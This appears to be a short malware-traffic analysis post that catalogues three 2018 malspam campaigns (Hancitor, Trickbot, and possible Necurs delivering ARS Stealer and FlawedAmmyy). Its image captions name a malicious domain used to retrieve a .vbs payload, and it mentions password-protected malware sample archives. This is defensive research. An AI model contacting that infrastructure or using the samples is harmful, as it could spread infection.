2018-04-24 - INFECTION TRAFFIC, EMAIL EXAMPLES, AND MALWARE FROM 3 MALSPAM CAMPAIGNS

HANCITOR MALSPAM:

 

TRICKBOT MALSPAM:

 

POSSIBLE NECURS BOTNET MALSPAM PUSHING ARS STEALER/ASPC BOT & FLAWEDAMMYY:

 

NOTES AND IMAGES FOR POSSIBLE NECURS BOTNET WAVE:

 


Shown above:  .url file causeing SMB traffic to blumblummpg.com to retrieve a .vbs file.

 


Shown above:  Port 80 HTTP POSTs are ARS Stealer/ASPC Bot traffic.  Port 443 traffic is FlawedAmmyy.

 


Shown above:  Some alerts on the traffic from Sguil in Security Onion using Suricata and the EmergingThreats Pro (ETPRO) ruleset.

 

FINAL NOTES

Zip archives are password-protected with the standard password.  If you don't know it, look at the "about" page of this website.

Click here to return to the main page.